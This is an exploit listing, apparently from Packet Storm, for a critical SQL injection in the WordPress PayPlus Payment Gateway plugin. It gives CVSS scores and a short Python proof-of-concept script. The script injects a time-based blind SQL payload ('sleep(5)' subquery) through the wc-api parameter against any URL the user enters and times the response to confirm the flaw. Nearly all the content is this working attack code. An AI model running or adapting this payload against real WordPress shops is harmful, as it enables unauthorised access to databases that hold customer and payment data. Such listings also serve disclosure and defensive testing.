packetstorm | J3r1ch0123, github.com | PACKETSTORM:179961
Aug 07, 2024 - 12:00 a.m.

WordPress PayPlus Payment Gateway SQL Injection

2024-08-07 00:00:00
j3r1ch0123, github.com
packetstormsecurity.com
Tags: wordpress, payplus, sql injection, python, exploit, security

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 7
Confidence: Low

```python
#!/usr/bin/env python3.11
import requests
import time

def exploit(url):
    payload = {"wc-api": "payplus_gateway&status_code=true&more_info=(select*from(select(sleep(5)))a)"}

    start = time.time()
    with requests.Session() as session:
        session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
        })
        response = requests.get(url, params=payload)
        print(f"Exploiting {url}...")

    end = time.time()
    print(response.status_code)
    response_time = end - start
    print(f"Response time: {response_time}...")

if __name__ == "__main__":
    url = input("Enter the vulnerable URL (e.g., https://test.site): ")
    if not url.startswith("http"):
        url = "http://" + url
    exploit(url)
```
